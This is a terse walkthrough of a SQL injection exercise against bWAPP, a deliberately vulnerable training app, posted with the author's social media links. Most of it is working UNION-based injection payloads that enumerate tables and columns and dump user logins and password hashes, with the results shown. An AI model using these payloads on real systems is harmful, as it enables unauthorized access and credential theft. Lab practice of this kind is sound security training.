bWAPP Lesson 2- SQL Injection (POST/Search)

1. <===============Hacker zurael sTz===============>
2. =================twitter=============================
3. https://twitter.com/zurael_stz
4. =================facebook============================
5. https://www.facebook.com/sTzisrael/
6. =====================================================
7. =================telegram============================
8. https://telegram.me/joinchat/BL8GnT_yQscC-6gBMuCW_w
9. =====================================================
10. <===============Hacker zurael sTz===============>
11.  
12. bWAPP Lesson 2- SQL Injection (POST/Search)
13. youtube : https://youtu.be/2Ma2kss9pAY
14.  
15. 'order by 9-- - : error
16. 'order by 8-- - : error
17. 'order by 7-- - : no error
18.  
19. 'union select 1,2,3,4,5,6,7-- - (Columns vulnerable) 2,4,5
20.  
21. 'union select 1,2,3,4,table_name,6,7 from information_schema.tables-- -
22. (all)
23. table : movies
24. table : blog
25. table : users
26.  
27. 'union select 1,2,3,4,group_concat(table_name),6,7 from information_schema.tables where table_schema=database()-- -
28.  
29. table : blog,heroes,movies,users,visitors
30.  
31. 'union select 1,2,3,4,group_concat(column_name),6,7 from information_schema.columns where table_name="users"-- -
32.  
33. Contents table: users
34. id,login,password,email,secret,activation_code,activated,reset_code,admin,user_id,first_name,last_name,user,password
35.  
36. 'union select 1,2,3,4,group_concat(login,0x2a,password),6,7 from users-- -
37.  
38. A.I.M.*6885858486f31043e5839c735d99457f045affd0,bee*6885858486f31043e5839c735d99457f045affd0
39. {
40. 1:
41. login : A.I.M
42. password : 6885858486f31043e5839c735d99457f045affd0
43. 2:
44. login : bee
45. password : 6885858486f31043e5839c735d99457f045affd0
46. }
47.  
48. 0x2a = *
49.  
50. #zurael_sTz